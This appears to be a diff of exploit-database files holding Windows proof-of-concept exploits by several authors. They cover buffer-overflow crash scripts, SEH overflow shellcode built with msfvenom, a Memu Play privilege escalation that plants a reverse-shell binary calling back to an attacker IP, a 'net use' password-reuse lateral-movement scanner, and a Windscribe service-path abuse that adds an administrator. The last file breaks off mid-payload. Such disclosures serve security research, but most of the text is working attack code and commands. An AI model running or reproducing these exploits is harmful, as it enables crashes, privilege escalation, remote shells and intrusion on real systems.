# Exploit Title: UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
#1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py
#2.- Open UltraViewer_VNCServer.txt and copy content to clipboard
#3.- Open UltraVNC Viewer
#4.- In "VNC Server" Paste Clipboard
#5.- Click on "Connect"
#6.- Crashed
cod = "\x41" * 256
f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w')
f.write(cod)
f.close()

22
exploits/windows/dos/48292.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
#1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py
#2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select File > Create SSH Key Files...
#5.- Select "Private key file:" field erease and Paste ClipBoard
#6.- Click on "Create public/private key files..."
#7.- Crashed
buffer = "\x41" * 2000
f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w")
f.write(buffer)
f.close()

21
exploits/windows/dos/48302.py Executable file
View file

@ -0,0 +1,21 @@
# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx"
# 2.- Open ZOC Terminal
# 3.- Select Script > Start REXX Script...
# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
# 5.- Crashed
cod = "\x41" * 20000
f = open('ZOC_7.25.5_Script.zrx', 'w')
f.write(cod)
f.close()

22
exploits/windows/dos/48305.py Executable file
View file

@ -0,0 +1,22 @@
# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-05-02
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
# 3.- Open AbsoluteTelnet
# 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
# 5.- In "username" field paste Clipboard
# 6.- Select "OK"
# 7.- Crashed
buffer = "\x41" * 1000
f = open ("absolutetelnet_username_SSH1.txt", "w")
f.write(buffer)
f.close()

70
exploits/windows/local/48283.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions
# Discovery by: chuyreds
# Discovery Date: 2020-03-08
# Vendor Homepage: https://www.memuplay.com/
# Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
# Tested Version: 7.1.3
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
# Description:
# Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions
# Prerequisites
# Local, Low privilege access with restart capabilities
# Details
# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.
# A low privilege account is able to rename the MemuService.exe file located in this same path and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.
C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)
BUILTIN\Administradores:(I)(F)
BUILTIN\Usuarios:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)
Se procesaron correctamente 1 archivos; error al procesar 0 archivos
C:\>sc qc MEmuSVC
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: MEmuSVC
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : MEmuSVC
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Proof of Concept
1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe
2. Setup listener and ensure apache is running on attacking machine
nc -lvp 443
service apache2 start
3. Download malicious .exe on victim machine
Open browser to http://192.168.1.130/MemuService.exe and download
4. Overwrite file and copy malicious .exe.
Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\
5. Restart victim machine
6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system

79
exploits/windows/local/48293.py Executable file
View file

@ -0,0 +1,79 @@
# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)
# Date: 2020-04-04
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html
# Version: 8
# Tested on: Windows 7 (x86)
# Proof of Concept:
# 1.- Run the python script, it will create a new file called "poc.m3l".
# 2.- Open the Application.
# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK.
# 4.- Click on the bottom-right button that displays an arrow and has written "LIST".
# 5.- Select the file "poc.m3l".
# 6.- Profit.
import struct
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread
# Payload size: 512 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72"
buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70"
buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b"
buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64"
buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51"
buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c"
buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57"
buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a"
buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71"
buf += b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62"
buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69"
buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62"
buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71"
buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73"
buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d"
buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f"
buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b"
buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a"
buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54"
buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f"
buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b"
buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62"
buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50"
buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46"
buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38"
buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d"
buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70"
buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52"
buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43"
buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f"
buf += b"\x75\x4d\x30\x41\x41"
nseh = "\x71\x41"
seh = "\x41\x4a"
alignment = ""
alignment += "\x54\x71" # push ebx, padding
alignment += "\x58\x71" # pop eax, padding
alignment += "\x05\x20\x22" # add eax, 0x22002000
alignment += "\x71" # Padding
alignment += "\x2D\x19\x22" # sub eax, 0x22001900
alignment += "\x71" # Padding
alignment += "\x50\x71" # push eax, padding
alignment += "\xC3" # retn
buffer = "A" * 536 + nseh + seh + "\x41\x71\x41\x71" + alignment + "C" * 71 + buf + "C" * 2000
f = open ("poc.m3l", "w")
f.write(buffer)
f.close()

313
exploits/windows/local/48299.txt Normal file
View file

@ -0,0 +1,313 @@
# Title: Microsoft NET USE win10 - Insufficient Authentication Logic
# Date: 2020-04-04
# Author: hyp3rlinx
# Vendor: www.microsoft.com
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows "net use" Command
Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections.
The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections.
[Vulnerability Type]
Insuffient Password Prompt
[CVE Reference]
N/A
[Security Issue]
The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account
is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately
we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to
has other vulnerabilities present.
In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected.
The authentication mechanism between the two network logon methods are inconsistent and in my opinion leaves an authentication loophole invitation.
Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less.
Requirements:
1) Remote system built-in Administrator account is enabled
2) Origination system users account password and the remote system Administrator passwords match (reuse).
Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case.
Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue.
However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails.
Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry.
Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections
and try them and if theres password reuse (likely) BOOM automagic logon.
This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used.
When testing make sure to logout then log back in after changing passwords so the environment is clean.
e.g.
1) Passwords for both systems are different and remote built-in Administrator account active:
C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
Enter the password for 'Administrator' to connect to '192.168.x.x':
System error 5 has occurred.
Access is denied.
2) Passwords for both origination system and remote match:
C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
The command completed successfully.
By the way as a side note DCERPC calls work as well, if both systems happen to have same password.
c:\>getmac /s x.x.x.x /U Administrator
MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same."
Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box?
Expected result: Consistent password dialog box, no matter if passwords match or not.
Actual Result: No prompt for a password if both systems passwords are the same.
Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC.
[Exploit/POC]
import os,re,time,signal,sys
from subprocess import *
from multiprocessing import Process
#By John Page (aka hyp3rlinx)
#Apparition Security
#twitter.com/hyp3rlinx
#-----------------------------------
#When a remote systems built-in Administrator account is enabled and both the remote and the target system
#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically.
#
#MountPoints2 and Terminal server client hints in the Windows registry can help us.
#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously.
#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons)
#MountPoints2 key entries are stored like '##10.2.1.40#c$'
#-----------------------------------------------------------
BANNER="""
_ ______________ ___ ____ __ _______ ______
/ | / / ____/_ __/ / | / __ )/ / / / ___// ____/
/ |/ / __/ / / / /| | / __ / / / /\__ \/ __/
/ /| / /___ / / / ___ |/ /_/ / /_/ /___/ / /___
/_/ |_/_____/ /_/ /_/ |_/_____/\____//____/_____/
By Hyp3rlinx
ApparitionSec
"""
DRIVE="X"
FINDME="The command completed successfully."
REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"'
REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s"
VULN_FOUND=set()
DELAY=2 #Any lower and we may get inaccurate results.
rdp_server_lst=[]
#Return prior network logons to remote systems.
def mountpoints2():
mntpoint2_connections=[]
try:
p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True)
tmp = p.stdout.readlines()
except Exception as e:
print("[!] "+str(e))
return False
for x in tmp:
idx = x.find("##")
clean = x[idx:]
idx2 = clean.rfind("#")
ip = clean[2:idx2]
ip = re.sub(r"#.*[A-Z,a-z]","",ip)
if ip not in mntpoint2_connections:
mntpoint2_connections.append(ip)
mntpoint2_connections = list(filter(None, mntpoint2_connections))
p.kill()
return mntpoint2_connections
#Terminal server client stores remote server connections.
def rdp_svrs():
global rdp_server_lst
try:
p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True)
tmp = p.stdout.readlines()
for key in tmp:
if key.find("Servers")!=-1:
pos = key.rfind("\\")
srv = key[pos + 1:].replace("\r\n","").strip()
rdp_server_lst.append(srv)
p.kill()
except Exception as e:
print("[!] "+str(e))
return False
return True
#Disconnect
def del_vuln_connection(ip):
try:
print("[!] Disconnecting vuln network logon connection.\n")
call(r"net use "+DRIVE+":"+" /del")
except Exception as e:
print("[!] "+str(e))
#Check connection
def chk_connection(ip):
print("[+] Testing: "+ip)
sys.stdout.flush()
cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True)
stderr, stdout = cmd.communicate()
if "Reply from" in stderr and "Destination host unreachable" not in stderr:
print("[*] Target up!")
return True
else:
print("[!] Target unreachable :(")
return False
#Test vuln
def Test_Password_Reuse(ip):
print("[+] Testing "+ip + " the builtin Administrator account.\n")
sys.stdout.flush()
try:
p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True)
err = p.stderr.readlines()
if err:
e = str(err)
if e.find("error 53")!=-1:
print("[*] Network path not found\n")
return
elif e.find("error 1219")!=-1:
print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n")
return
elif e.find("error 85")!=-1:
print("[*] The local device name is already in use.\n")
return
else:
print(e+"\n")
tmp = p.stdout.read()
if FINDME in tmp:
print("[*] Password reuse for the built-in Administrator found!")
print("[+] Connected to target: "+ ip)
VULN_FOUND.add(ip+":Administrator")
del_vuln_connection(ip)
p.kill()
except Exception as e:
print("[!] "+str(e))
#Authenticate
def auth(ip):
action_process = Process(target=Test_Password_Reuse, args=(ip,))
action_process.start()
action_process.join(timeout=5)
action_process.terminate()
if __name__ == "__main__":
print(BANNER)
print("[+] Windows 'net use' Network Logon Type-3")
print("[+] Insufficient Password Prompt")
print("[+] By hyp3rlinx\n")
time.sleep(3)
print("[+] Deleting any existing network logons to start clean.")
#Make sure no exist sessions already exist.
call(r"net use * /del /y")
sys.stdout.flush()
time.sleep(1)
#Grab previous connections from MountPoints2 if any.
rdp_svrs()
svrlst=mountpoints2()
if svrlst:
svrlst + rdp_server_lst
else:
svrlst = rdp_server_lst
if not svrlst:
print("[*] No MountPoints2 artifacts found, enter an IP.")
sys.stdout.flush()
ip=raw_input("[+] Target IP> ")
if chk_connection(ip):
auth(ip)
else:
#We have MountPoints2 or RDP Server list IP we can try.
for ip in svrlst:
if chk_connection(ip):
auth(ip)
time.sleep(DELAY)
if len(VULN_FOUND) != 0:
print("[*] Located the following vulnerable systems:")
sys.stdout.flush()
for v in VULN_FOUND:
print("[+] "+v)
else:
print("[+] All previous attempts failed, enter an IP and give it a shot!.")
sys.stdout.flush()
ip=raw_input("[+] Target IP> ")
if chk_connection(ip):
auth(ip)
[POC Video URL]
https://www.youtube.com/watch?v=Je93Neb0k8g
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: February 28, 2020
MSRC "behavior you are reporting is by design" : March 30, 2020
April 5, 2020 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

52
exploits/windows/local/48306.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Date: 2020-04-10
# Exploit Author: MgThuraMoeMyint
# Vendor Homepage: https://windscribe.com
# Version: v1.83 Build 20
# Tested on: Windows 10, version 1909
In windscribe v1.83 , there is a service via windscribe that every
authenticated user can modify.
C:\Users\mgthura>sc qc WindscribeService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WindscribeService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WindscribeService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
That shows that running as Local System this means that the
BINARY_PATH_NAME parameter can be modified to execute any command on
the system.
I'll change binary_path_name with a command that add a user to
administrators group , so it will be
C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup
administrators pentest /add"
[SC] ChangeServiceConfig SUCCESS
C:\Users\mgthura>sc stop WindscribeService
SERVICE_NAME: WindscribeService
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x4
WAIT_HINT : 0x0
C:\Users\mgthura>sc start WindscribeService
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Restarting service will cause the service to fail as the binary path
would not point into the actual executable of the service.
However the command will be executed successfully and the user will be
added to the local administrators group.

324
exploits/windows/local/48314.py Executable file
View file

@ -0,0 +1,324 @@
# Exploit Title: Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)
# Exploit Author: Bobby Cooke
# Date: 2020-04-11
# Vendor: Drive Software Company
# Vendor Site: http://www.drive-software.com
# Software Download: http://www.drive-software.com/download/freeclock.exe
# Tested On: Windows 10 - Pro 1909 (x86) & Home 1909 (x86)
# - Does not work on x64 version
# Version: Free Desktop Clock 3.0
# Recreate: Install & Open > Time Zones > 'Enter display name' textbox > paste buffer
############################### CRASH INFO ###############################
# [!] Access violation
# 042D15E7 8908 mov [eax], ecx ; FreeDesk.00440044
# SEH chain of main thread
# Address SE handler
# 0014EE24 FreeDesk.00410041 <- Structured Exception Handler Overwrite
# 00410041 74737953
# 69620C00 *** CORRUPT ENTRY ***
############################### CRASH INFO ###############################
File = 'poc.txt'
######################### EXPLOIT ENVIRONMENT INFO #########################
#badChars = '\x00\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e'
#badChars += '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f'
#goodChars = '\x81\x8D\x8F\x90\x9D' (within 0x80-0x9f)
# Base | Rebase | SafeSEH | ASLR | NXCompat | Modulename
# 0x00400000 | False | False | False | False | [FreeDesktopClock.exe]
# 0x042b0000 | True | False | False | False | [Clock.dll]
######################### EXPLOIT ENVIRONMENT INFO #########################
os_nSEH = '\x41'*(457) # Offset to nSEH Overwrite
nSEH = '\xeb\x05' # jmp short +2
SEH = '\xeb\x43' # 0x004300eb: pop esi# pop ebx# ret [FreeDesktopClock.exe]
# nSEH & SEH translated opcodes after Pop-Pop-Ret
# EB 00 jmp short +2
# 05 00EB0043 add eax, 4300EB00
# GetPC to decode our decoder using Venetian Blinds technique
getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory
getPC += '\x61' # popad # [ESP] = &Payload
getPC += '\x72' # add [edx], dh # realigns execution for 1 byte opcodes
ebx2eax = '\x58' # pop eax # EAX = &Payload
ebx2eax += '\x72' # add [edx], dh
# Use Venetian Blinds technique to fix our mangled decoder
# + Using the Venetian Blinds Technique costs 14 bytes to fill 1 0x00 with 1 legit shellcode byte.
#
# Ajust EAX to &Decoder
getDecoder = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes
getDecoder += '\x72' # add [edx], dh
getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder
getDecoder += '\x72' # add [edx], dh
getDecoder += '\x50' # push eax # [ESP] = &Decoder
getDecoder += '\x72' # add [edx], dh
############################# ZIPPER DECODER ###############################
# Set EAX = First non-null byte of shellcode
# init:
# 1 | 50 | push eax # EAX = &Shellcode
# 2 | 5F | pop edi # EDI = Decoder Destination Base Address
# 3 | 47 | inc edi # First 0x00 byte of shellcode
# 4:5 | 33D2 | xor edx, edx
# 6:7 | 33C9 | xor ecx, ecx
# 8:11 | 66:B9 1004 | mov cx, 410 # ECX = Loop Counter
# decodeLoop:
# 12:13 | 33DB | xor ebx, ebx
# 14 | 42 | inc edx # EDX+EAX = &SourceShellcodeByte
# 15 | 42 | inc edx # increment to next non-null byte
# 16:17 | 32DB | xor bl, bl # clear BL to hold next shellcode byte
# 18:20 | 021C10 | add bl, [eax+edx] # BL = SourceShellcodeByte
# 21:22 | 203F | and [edi], bh # [EDI] = SC-byte, clear with: AND 0x00
# 23:24 | 301F | xor [edi], bl # Write next byte of shellcode
# 25 | 47 | inc edi
# 26 | 49 | dec ecx
# 27:28 | 74 02 | je short jmp2code
# 29:30 | ^ EB ED | jmp short decodeLoop
# jmp2code:
# 31 | 50 | push eax
# 32 | C3 | ret
################################################3###########################
#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3'
firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50'
#venBldHalf = '5F 33 33 66 10 33 42 32 02 10 3F 1F 49 02 ED C3'
# 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32
# Note: These nop unicode instructions are actually [reg+0x00] not [reg]
# The [reg] version (0032) is 2 bytes. The [reg+0x00] version (007200) is 3 bytes
# Use the 3 byte version for Venetian Blinds alignment
# Example:
# nasm > add [edx], dh
# 00000000 0032 add [edx],dh
# nasm > add [edx+00], dh
# 00000000 0032 add [edx],dh
# nasm > add [edx+01], dh
# 00000000 007201 add [edx+0x1],dh
# + This happens when typing in ASM commands into msf-nasm_shell and immunity
## 2nd byte - \x00 => \x5F
venBlinds = '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\xC6\x5F' # mov byte [eax], 0x50
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 4th byte - \x00 => \x33
venBlinds += '\xC6\x33' # mov byte [eax], 0x33
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 6th byte - \x00 => \x33
venBlinds += '\xC6\x33' # mov byte [eax], 0x33
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 8th byte - \x00 => \x66
venBlinds += '\xC6\x66' # mov byte [eax], 0x66
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 10th byte - \x00 => \x10
venBlinds += '\xC6\x10' # mov byte [eax], 0x10
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 12th byte - \x00 => \x33
venBlinds += '\xC6\x33' # mov byte [eax], 0x33
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 14th byte - \x00 => \x42
venBlinds += '\xC6\x42' # mov byte [eax], 0x42
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 16th byte - \x00 => \x32
venBlinds += '\xC6\x32' # mov byte [eax], 0x32
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 18th byte - \x00 => \x02
venBlinds += '\xC6\x02' # mov byte [eax], 0x02
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 20th byte - \x00 => \x10
venBlinds += '\xC6\x10' # mov byte [eax], 0x10
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
